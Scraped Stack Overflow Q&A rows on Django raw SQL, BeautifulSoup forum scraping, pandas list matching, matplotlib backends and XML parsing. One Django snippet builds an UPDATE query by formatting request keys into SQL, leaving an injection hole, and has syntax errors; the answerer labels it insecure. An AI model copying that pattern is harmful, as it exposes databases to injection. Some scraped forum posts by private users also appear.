</code></pre>
<p>or ...</p>
<pre><code># yourapp.urls
from .views import mywholeurl
from django.conf.urls import url
urlpatterns = [
url('users/(\d+)', mywholeview),
]
# yourapp.views
from django.db import connection
from rest_framework import status
from rest_framework.response import Response
def mywholeview(request, id):
cursor = connection.cursor()
if request.method in ('POST', 'PUT'):
cursor.execute('update yourapp_foo set %s where id = %%s' % ', '.join(["%s=%%s" % p[0] for p in request.data.items()]), list(p[1] for p in request.data.items()) + [id])
row = cursor.fetchone()
if row[0]
return Response(status=status.HTTP_201_ACCEPTED)
else:
return Response(status=status.HTTP_404_NOT_FOUND)
elif request.method = 'GET':
cursor.execute('select * from yourapp_foo where id = %s', [id])
row = cursor.fetchone()
if row:
columns = [col[0] for col in cursor.description]
data = zip(columns, row)
return Response(data, status=status.HTTP_200_OK)
else:
return Response(status=status.HTTP_404_NOT_FOUND)
elif request.method = 'DELETE':
cursor.execute('delete from yourapp_foo where id = %s', [id])
row = cursor.fetchone()
if not int(row[0]):
return Response(status=status.HTTP_404_NOT_FOUND)
else:
return Response(status=status.HTTP_204_NO_CONTENT)
</code></pre>
<p><em>the latter code is untested and only serves for teoretical purpose. it is pretty insecure and not intended to be executed in production since it is a bad idea</em></p>
<p>I would prefer with the shortest approach.</p>
<p>My conclusion is: learn the ORM! If you need to respect your database because it is preexisting, you could use <code>managed</code> models. But always... use the ORM and the features given to you by both Django and DRF.</p>
| 0 | 2016-08-03T18:05:45Z | [
"python",
"django",
"django-rest-framework"
] |
Web Scraping a Forum Post in Python Using Beautiful soup and lxml Cannot get all posts | 38,745,080 | <p>Im having an issue that is driving me absolutely crazy. I am a newbie to web scraping, and I am practicing web scraping by trying to scrape the contents of a forum post, namely the actual posts people made. I have isolated the posts to what i think contains the text which is div id="post message_ 2793649 (see attached Screenshot_1 for better representation of the html)<a href="http://i.stack.imgur.com/6L3zf.png" rel="nofollow">Screenshot_1</a></p>
<p>The example above is just one of many posts. Each post has its own unique identifier number, but the rest is consistent as div id="post_message_.</p>
<p>here is what I am stuck at currently</p>
<pre><code>import requests
from bs4 import BeautifulSoup
import lxml
r = requests.get('http://www.catforum.com/forum/43-forum-fun/350938-count-one- billion-2016-a-120.html')
soup = BeautifulSoup(r.content)
data = soup.find_all("td", {"class": "alt1"})
for link in data:
print(link.find_all('div', {'id': 'post_message'}))
</code></pre>
<p>the above code just creates a bunch of empty lists that go down the page its so frustrating. (See Screenshot_2 for the code that I ran with its output next to it)
<a href="http://i.stack.imgur.com/nBcOl.png" rel="nofollow">Screenshot_2</a>
What am I missing.</p>
<p>The end result that I am looking for is just all the contents of what people said contained in a long string without any of the html clutter. </p>
<p>I am using Beautiful Soup 4 running the lxml parser </p>
| 0 | 2016-08-03T13:30:18Z | 38,745,900 | <p>There's nothing with the id <code>post_message</code>, so <code>link.find_all</code> returns an empty list. You'll first want to grab all of the ids within all the <code>div</code>s, and then filter that list of ids with a regex (e.g.) to get only those that start with <code>post_message_</code> and then a number. Then you can do</p>
<pre><code>for message_id in message_ids:
print(link.find_all('div', {'id': message_id}))
</code></pre>
| 0 | 2016-08-03T14:04:51Z | [
"python",
"web-scraping",
"beautifulsoup",
"lxml"
] |
Web Scraping a Forum Post in Python Using Beautiful soup and lxml Cannot get all posts | 38,745,080 | <p>Im having an issue that is driving me absolutely crazy. I am a newbie to web scraping, and I am practicing web scraping by trying to scrape the contents of a forum post, namely the actual posts people made. I have isolated the posts to what i think contains the text which is div id="post message_ 2793649 (see attached Screenshot_1 for better representation of the html)<a href="http://i.stack.imgur.com/6L3zf.png" rel="nofollow">Screenshot_1</a></p>
<p>The example above is just one of many posts. Each post has its own unique identifier number, but the rest is consistent as div id="post_message_.</p>
<p>here is what I am stuck at currently</p>
<pre><code>import requests
from bs4 import BeautifulSoup
import lxml
r = requests.get('http://www.catforum.com/forum/43-forum-fun/350938-count-one- billion-2016-a-120.html')
soup = BeautifulSoup(r.content)
data = soup.find_all("td", {"class": "alt1"})
for link in data:
print(link.find_all('div', {'id': 'post_message'}))
</code></pre>
<p>the above code just creates a bunch of empty lists that go down the page its so frustrating. (See Screenshot_2 for the code that I ran with its output next to it)
<a href="http://i.stack.imgur.com/nBcOl.png" rel="nofollow">Screenshot_2</a>
What am I missing.</p>
<p>The end result that I am looking for is just all the contents of what people said contained in a long string without any of the html clutter. </p>
<p>I am using Beautiful Soup 4 running the lxml parser </p>
| 0 | 2016-08-03T13:30:18Z | 38,747,669 | <p>You have a couple of issues, the first being you have multiple spaces in the url so you are not going to the page you think you are:</p>
<pre><code>In [50]: import requests
In [51]: r.url # with spaces
Out[51]: 'http://www.catforum.com/forum/43-forum-fun/350938-count-one-billion-2016-a-120.html'
Out[49]: 'http://www.catforum.com/forum/'
In [50]: r = requests.get('http://www.catforum.com/forum/43-forum-fun/350938-count-one-billion-2016-a-120.html')
In [51]: r.url # without spaces
Out[51]: 'http://www.catforum.com/forum/43-forum-fun/350938-count-one-billion-2016-a-120.html'
</code></pre>
<p>The next issue is the <em>id's</em> start with <em>post_message</em>, none are equal to <em>post_message</em> exactly, you can use a css selector that will match id's starting with <em>post_message</em> to pull all the divs you want, then just extract the text:</p>
<pre><code>r = requests.get('http://www.catforum.com/forum/43-forum-fun/350938-count-one-billion-2016-a-120.html')
soup = BeautifulSoup(r.text)
for div in soup.select('[id^=post_message]'):
print(div.get_text("\n", strip=True))
</code></pre>
<p>Which will give you:</p>
<pre><code>11311301
Did you get the cortisone shots? Will they have to remove it?
My Dad and stepmom got a new Jack Russell! Her name's Daisy. She's 2 years old, and she's a rescue(d) dog. She was rescued from an abusive situation. She can't stand noise, and WILL NOT allow herself to be picked up. They're working on that. Add to that the high-strung, hyper nature of a Jack Russell... But they love her. When I called last night, Pat was trying to teach her 'sit'!
11302
Well, I tidied, cleaned, and shopped. Rest of the list isn't done and I'm too tired and way too hot to care right now.
Miss Luna is howling outside the Space Kitten's room because I let her out and gave them their noms. SHE likes to gobble their food.....little oink.
11303
Daisy sounds like she has found a perfect new home and will realize it once she feels safe.
11304
No, Kurt, I haven't gotten the cortisone shot yet. They want me to rest it for three weeks first to see if that helps. Then they would try a shot and remove it if the shot doesn't work. It might feel a smidge better today but not much.
So have you met Daisy in person yet? She sounds like a sweetie.
And Carrie, Amelia is a piggie too. She eats the dog food if I don't watch her carefully!
11305
I had a sore neck yesterday morning after turning it too quickly. Applied heat....took an anti-inflammatory last night. Thought I'd wake up feeling better....nope....still hurts. Grrrrrrrr.
11306
MM- Thanks for your welcome to the COUNTING thread. Would have been better if I remembered to COUNT. I've been a long time lurker on the thread but happy now to get involved in the chat.
Hope your neck is feeling better. Lily and Lola are reminding me to say 'hello' from them too.
11307
Welcome back anniegirl and Lily and Lola! We didn't scare you away! Yeah!
Nightmare afternoon. My SIL was in a car accident and he car pools with my daughter. So, in rush hour, I have to drive an hour into Vancouver to get them (I hate rush hour traffic....really hate it). Then an hour back to their place.....then another half hour to get home. Not good for the neck or the nerves (I really hate toll bridges and driving in Vancouver and did I mention rush hour traffic). At least he is unharmed. Things we do for love of our children!
11308. Hi annegirl! None of us can count either - you'll fit right in.
MM, yikes how scary. Glad he's ok, but that can't have been fun having to do all that driving, especially with an achy neck.
I note that it's the teachers on this thread whose bodies promptly went down...coincidentally once the school year was over...
DebS, how on earth are you supposed to rest your foot for 3 weeks, short of lying in bed and not moving?
MM, how is your shoulder doing? And I missed the whole goodbye to Pyro.
Gah, I hope it slowly gets easier over time as you remember that they're going to families who will love them.
I'm finally not constantly hungry, just nearly constantly.
My weight had gone under 100 lbs
so I have quite a bit of catching up to do. Because of the partial obstruction I had after the surgery, the doctor told me to try to stay on a full liquid diet for a week. I actually told him no, that I was hungry, lol. So he told me to just be careful. I have been, mostly (bacon has entered the picture 3 times in the last 3 days
) and the week expired today, so I'm off to the races.
11309
Welcome to you, annegirl, along with Lily and Lola! We always love having new friends on our counting thread.
And Spirite, good to hear from you and I'm glad you are onto solid foods.
11310
DebS and Spirite thank you too for the Welcome. Oh MM what an ordeal with your daughter but glad everyone us on.
DevS - hope your foot is improving Its so horrible to be in pain.
Spirite - go wild on the bacon and whatever else you fancy. I'm making a chocolate orange cheese cake to bring to a dinner party this afternoon. It has so much marscapone in it you put on weight just looking at it.
</code></pre>
<p>If you wanted to use <em>find_all</em>, you would need to use a regex:</p>
<pre><code>import re
r = requests.get('http://www.catforum.com/forum/43-forum-fun/350938-count-one-billion-2016-a-120.html')
soup = BeautifulSoup(r.text)
for div in soup.find_all(id=re.compile("^post_message")):
print(div.get_text("\n", strip=True))
</code></pre>
<p>The result will be the same.</p>
| 0 | 2016-08-03T15:21:20Z | [
"python",
"web-scraping",
"beautifulsoup",
"lxml"
] |
How can I make a plot appear in a new window, such that I can inspect it (zoom in etc.)? | 38,745,103 | <p><img src="http://i.stack.imgur.com/5XoHV.png" alt="Codeplot">
I wrote the code above and it is showing my plot in the Ipython console. However, I want to inspect the plot i.e. be able to zoom in/out and have coordinates displayed when moving my cursor. </p>
<p>I know I can do this with executing the file from the location where it is saved. But is there a way to immediately show the plot in a new window when running my file in spyder?</p>
| 0 | 2016-08-03T13:31:09Z | 38,745,347 | <p>I see that you have <code>pyplot</code> already imported. Run the following in your console:</p>
<pre><code>plt.switch_backend('qt4agg')
</code></pre>
<p>If this does not work because the name <code>plt</code> is not recognized, import it in the console:</p>
<pre><code>from matplotlib import pyplot as plt
</code></pre>
| 0 | 2016-08-03T13:40:50Z | [
"python",
"plot",
"show",
"interactive"
] |
Match identical words in two prints | 38,745,163 | <p>I am using os to list the filenames within a directory. I am also using pandas to list the contents of one column in a CSV file. I have printed the results of both and now I want to match the names that appear in both prints and also identify which names are exclusive to one print. Below is my code which gets the names and the contents of the CSV file. </p>
<pre><code>import os, sys
import pandas as pd
path = "/mydir/csvfile"
dirs = os.listdir( path )
for file in dirs:
print file
fields = ['Column']
df = pd.read_csv('/mydir/csv_file', skipinitialspace=True, usecols=fields)
print df.Column
</code></pre>
<p><strong>* EDIT *</strong></p>
<p>I have come up with this solution that works. </p>
<pre><code>import os, sys
import pandas as pd
path = "/mdir/csvfile"
dirs = os.listdir( path )
list_1 = [file for file in dirs]
fields = ['column']
df = pd.read_csv('/mydir/csvfile', skipinitialspace=True, usecols=fields)
list_2 = df.column.values.tolist()
list_3=[]
for i in list_1:
if i in list_2:
list_3.append(i + " True")
else:
list_3.append(i + " False")
print list_3
</code></pre>
| 2 | 2016-08-03T13:33:19Z | 38,745,667 | <p>So as I understand it you have two lists. One from the directory and another from a column in Pandas. You want the elements that are in both lists as well as the elements that are unique to each list. Lets say your lists are like this:</p>
<pre><code>List1 = ['a' , 'b' , 'c' , 'd', 'e', 'f']
List2 = ['c' , 'd' , 'e' , 'f' , 'g' , 'h' , 'i']
</code></pre>
<p>Then your code to produce what I think you want could use list comprehensions and go like this:</p>
<pre><code>overlap = [i for i in List1 if i in List2]
nonOverlapList1 = [j for j in List1 if j not in overlap]
nonOverlapList2 = [k for k in List2 if k not in overlap]
</code></pre>
| 1 | 2016-08-03T13:55:01Z | [
"python",
"csv",
"pandas"
] |
Match identical words in two prints | 38,745,163 | <p>I am using os to list the filenames within a directory. I am also using pandas to list the contents of one column in a CSV file. I have printed the results of both and now I want to match the names that appear in both prints and also identify which names are exclusive to one print. Below is my code which gets the names and the contents of the CSV file. </p>
<pre><code>import os, sys
import pandas as pd
path = "/mydir/csvfile"
dirs = os.listdir( path )
for file in dirs:
print file
fields = ['Column']
df = pd.read_csv('/mydir/csv_file', skipinitialspace=True, usecols=fields)
print df.Column
</code></pre>
<p><strong>* EDIT *</strong></p>
<p>I have come up with this solution that works. </p>
<pre><code>import os, sys
import pandas as pd
path = "/mdir/csvfile"
dirs = os.listdir( path )
list_1 = [file for file in dirs]
fields = ['column']
df = pd.read_csv('/mydir/csvfile', skipinitialspace=True, usecols=fields)
list_2 = df.column.values.tolist()
list_3=[]
for i in list_1:
if i in list_2:
list_3.append(i + " True")
else:
list_3.append(i + " False")
print list_3
</code></pre>
| 2 | 2016-08-03T13:33:19Z | 38,745,723 | <p>Instead of</p>
<pre><code>for file in dirs:
print file
</code></pre>
<p>Build a list:</p>
<pre><code>files = [file for file in dirs]
</code></pre>
<p>Then use the DataFrame to check:</p>
<pre><code>df.Column.isin(files) # this will check elementwise
Out:
0 True
1 True
2 True
3 True
Name: Column, dtype: bool
</code></pre>
<p>Or</p>
<pre><code>df.Column.isin(files).all() # if all of them are the same
Out: True
</code></pre>
| 2 | 2016-08-03T13:57:08Z | [
"python",
"csv",
"pandas"
] |
XML parsing in python while retaining link to position in original file | 38,745,263 | <p>I need to extract certain data from XML files, but also know the position where the extracted element was located in the original XML file - as a character offset from file beginning, or a line number + position in that line.</p>
<p>The commonly used python XML libraries don't seem to provide any such functionality.</p>
<p>There is a similar question <a href="http://stackoverflow.com/questions/28728498/obtaining-position-info-when-parsing-html-in-python">Obtaining position info when parsing HTML in Python</a> that was solved by writing a custom wrapper around html5lib; but that library won't work for me as the particular data is not HTML.</p>
<p>Are there any XML parsers that keep the element position information, or do I have to roll my own parsing for that?</p>
| 0 | 2016-08-03T13:37:02Z | 38,745,434 | <p>I don't think such things exists. Most parsers do the parsing first (manipulate the text stream into tokens and then parse it into a tree). By that time, they usually have a good knowledge of where they are in the original stream (this is required to output parsing errors). However once the object tree has been built this information is of small use and no longer accessible into the resulting objects.</p>
<p>A nice and ugly hack (at the same time!) would be to tokenize the XML input, add "position" attribute(s) refering to the original stream position, parse the XML with a regular library and use this attribute(s) later for user information...</p>
<p>Let us know how you did that!</p>
| 0 | 2016-08-03T13:45:00Z | [
"python",
"xml",
"elementtree"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.